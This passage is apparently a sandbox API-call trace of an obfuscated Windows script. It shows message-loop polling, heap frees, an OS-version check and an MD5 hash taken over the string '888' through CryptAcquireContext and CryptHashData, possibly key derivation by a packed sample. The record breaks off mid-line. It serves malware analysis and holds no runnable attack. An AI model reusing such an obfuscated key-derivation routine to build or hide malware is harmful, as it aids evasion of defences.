PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.918] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.919] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0215.919] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.919] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.920] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0215.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.920] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.920] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.920] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.920] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.920] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.921] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.921] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.921] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.921] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.921] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.921] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7160, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.921] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c220) returned 1 [0215.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.922] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.922] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.922] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.922] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.922] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.922] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.922] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.922] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.922] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.923] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.923] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.923] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.923] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.923] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.923] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.923] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.923] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.923] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.924] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.924] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.924] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.924] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.924] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.924] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.924] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.924] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.924] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.925] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.925] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.925] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.925] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.925] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.925] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabcf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.926] CryptCreateHash (in: hProv=0xa7c220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.926] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.926] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.926] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.926] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.926] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.926] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabae8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.927] CryptHashData (hHash=0x9e21f8, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.927] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.927] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.927] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, 